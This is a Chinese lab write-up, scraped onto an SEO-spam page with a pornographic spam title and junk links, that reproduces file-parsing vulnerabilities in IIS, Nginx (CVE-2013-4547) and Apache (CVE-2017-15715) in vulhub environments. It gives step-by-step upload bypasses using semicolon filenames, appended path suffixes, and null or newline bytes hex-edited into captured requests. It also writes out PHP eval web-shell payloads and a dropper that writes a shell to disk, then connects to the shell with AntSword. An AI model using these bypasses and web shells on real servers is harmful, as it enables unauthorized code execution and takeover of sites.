中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

專門做金融培訓(xùn)的網(wǎng)站有哪些臨沂seo排名外包

專門做金融培訓(xùn)的網(wǎng)站有哪些,臨沂seo排名外包,怎么創(chuàng)網(wǎng)站賺錢,淮安做網(wǎng)站seo一.IIS解析漏洞復(fù)現(xiàn) 1.IIS6.X 方式一:目錄解析 搭建IIS環(huán)境 在網(wǎng)站下建立文件夾的名字為.asp/.asa 的文件夾,其目錄內(nèi)的任何擴(kuò)展名的文件都被IIS當(dāng)作asp文件來(lái)解析并執(zhí)行。 訪問(wèn)成功被解析 方式一:目錄解析 在IIS 6處理文件解…

一.IIS解析漏洞復(fù)現(xiàn)

1.IIS6.X

方式一:目錄解析

搭建IIS環(huán)境

在網(wǎng)站下建立文件夾的名字為.asp/.asa 的文件夾,其目錄內(nèi)的任何擴(kuò)展名的文件都被IIS當(dāng)作asp文件來(lái)解析并執(zhí)行。

?

訪問(wèn)成功被解析

方式一:目錄解析

在IIS 6處理文件解析時(shí),分號(hào)可以起到截?cái)嗟男Ч?。也就是說(shuō) shel.asp;.jpg會(huì)被服務(wù)器看成是shell.asp。另外IIS6.0默認(rèn)的可執(zhí)行文件除了asp還包含 asa\cer\cdx

創(chuàng)建一個(gè)文件1.asp;.jpg

寫入以下內(nèi)容

訪問(wèn),成功被解析

2.IIS7.X

在I1S7.0和I1S7.5版本下也存在解析漏洞,在默認(rèn)Fast-CGI開啟狀況下,在一個(gè)文件路徑/xx.jpg后面加上/xx.php會(huì)將/xx.jpg/xx.php 解析為 php 文件。

首先安裝phpStudyIIS版

再安裝對(duì)應(yīng)的Windows服務(wù),啟動(dòng)phpStudy

打開IIS管理器,做如下操作,點(diǎn)擊確定

找到php的配置文件將下面內(nèi)容取消注釋,重啟phpStudy

在網(wǎng)站的根目錄下創(chuàng)建一個(gè)1.jpg寫入以下內(nèi)容<?php phpinfo(); ?>,在路徑后加上/.php訪問(wèn),php代碼被成功解析

二.Nginx解析漏洞復(fù)現(xiàn)

創(chuàng)建環(huán)境

安裝docker:all docker.io

安裝docker-compose:apt install docker-compose

拉取靶場(chǎng)鏡像:git clone https://github.com/vulhub/vulhub.git

進(jìn)入以下Vulhub路徑并開啟容器

cd /nginx/nginx_parsing_vulnerability

docker-compose build

docker-compose up -d

docker ps -a

1.nginx_parsing

這個(gè)解析漏洞其實(shí)是PHP CGI的漏洞,在PHP的配置文件中有一個(gè)關(guān)鍵的選項(xiàng)cgi.fix_pathinfo默認(rèn)是開啟的,當(dāng)URL中有不存在的文件,PHP就會(huì)向前遞歸解析。在一個(gè)文件/xx.jpg后面加上/.php會(huì)將/xx.jpg/xx.php 解析為 php 文件。

上傳一個(gè)jpg文件寫入以下代碼GIF89a

<?php phpinfo(); ?>,上傳

上傳成功

在路徑后面加入/.php訪問(wèn),成功解析到文件里的php代碼

2.CVE-2013-4547

上傳文件,文件里寫入<?php fputs(fopen('xnq.php','w'),'<?php @eval($_POST["cmd"])?>');?>

Bp開啟抓包,提交查詢

點(diǎn)擊Hex,找到剛剛的兩個(gè)空格,修改第二個(gè)20為00,放行

上傳成功

在.php和.jpg中間輸入兩個(gè)空格,訪問(wèn)抓包

點(diǎn)擊Hex,找到第修改的二個(gè)空格修改20為00,放行

訪問(wèn)成功,代碼被成功執(zhí)行

再訪問(wèn)一下我們的寫入的木馬文件,成功訪問(wèn),說(shuō)明寫入成功

用中國(guó)蟻劍鏈接,連接成功

三.Apache解析漏洞復(fù)現(xiàn)

1.apache_parsing

上傳一個(gè)后綴名是.php.jpg的文件里面寫入<?php phpinfo(); ?>

上傳成功

訪問(wèn)上傳的文件,php代碼被成功解析

2.CVE-2017-15715

上傳文件,文件里寫入一句話木馬<?php @eval($_POST['cmd']); ?>

Bp開啟抓包,提交查詢

點(diǎn)擊Hex,修改20為0a,放行

訪問(wèn)文件名+%0a,訪問(wèn)成功

用中國(guó)蟻劍鏈接,連接成功

http://www.risenshineclean.com/news/64657.html

相關(guān)文章:

  • ifront做原型控件的網(wǎng)站軟文發(fā)稿系統(tǒng)
  • 網(wǎng)站界面用什么做的愛(ài)站網(wǎng)的關(guān)鍵詞是怎么來(lái)的
  • 在哪給人做網(wǎng)站企業(yè)如何做網(wǎng)站
  • 中國(guó)攝影官方網(wǎng)站思億歐seo靠譜嗎
  • 重慶大足網(wǎng)站建設(shè)百度搜索風(fēng)云榜總榜
  • 門戶建設(shè)開源軟件沈陽(yáng)關(guān)鍵詞seo
  • 嘉定區(qū)做網(wǎng)站seo類目鏈接優(yōu)化
  • 套模板的網(wǎng)站多少錢關(guān)鍵詞排名優(yōu)化網(wǎng)站
  • 河南平臺(tái)網(wǎng)站建設(shè)seo推廣外包企業(yè)
  • 做影視網(wǎng)站用的封面網(wǎng)絡(luò)營(yíng)銷的特征和功能
  • 網(wǎng)站icp備案信息是什么滄州網(wǎng)站建設(shè)推廣
  • 去哪里學(xué)習(xí)做網(wǎng)站關(guān)鍵詞查詢網(wǎng)址
  • 黃岡網(wǎng)站建設(shè)哪家便宜學(xué)網(wǎng)絡(luò)營(yíng)銷
  • 小企業(yè)網(wǎng)站建設(shè)怎樣可以快速百度合伙人官方網(wǎng)站
  • 校園二手交易網(wǎng)站要怎么做呀結(jié)構(gòu)優(yōu)化設(shè)計(jì)
  • 河北今日疫情最新情況路由優(yōu)化大師官網(wǎng)
  • 公司網(wǎng)站建設(shè)和推廣無(wú)代碼網(wǎng)站開發(fā)平臺(tái)
  • 電影網(wǎng)站怎么做laravel關(guān)鍵詞排名的排名優(yōu)化
  • 什么網(wǎng)站可以找手工活做廣州營(yíng)銷網(wǎng)站建設(shè)靠譜
  • 寧波企業(yè)網(wǎng)站開發(fā)百度seo教程
  • Nginx做跳轉(zhuǎn)到其他網(wǎng)站濟(jì)南網(wǎng)站建設(shè)哪家便宜
  • 手機(jī)網(wǎng)站廣告自己想開個(gè)網(wǎng)站怎么弄
  • 桐梓縣工程建設(shè)交易網(wǎng)站子域名在線查詢
  • 湛江網(wǎng)站關(guān)鍵詞優(yōu)化網(wǎng)絡(luò)營(yíng)銷技巧和營(yíng)銷方法
  • 企業(yè)網(wǎng)站的主要類型廣東的seo產(chǎn)品推廣服務(wù)公司
  • 網(wǎng)站建設(shè)費(fèi) 什么科目品牌推廣宣傳詞
  • 獨(dú)立個(gè)人博客網(wǎng)站制作微信公眾號(hào)怎么開通
  • 優(yōu)秀網(wǎng)站制作深圳網(wǎng)站開發(fā)制作
  • 網(wǎng)站建設(shè)教程互聯(lián)網(wǎng)電商平臺(tái)有哪些
  • 做詐騙網(wǎng)站以及維護(hù)cpa推廣接單平臺(tái)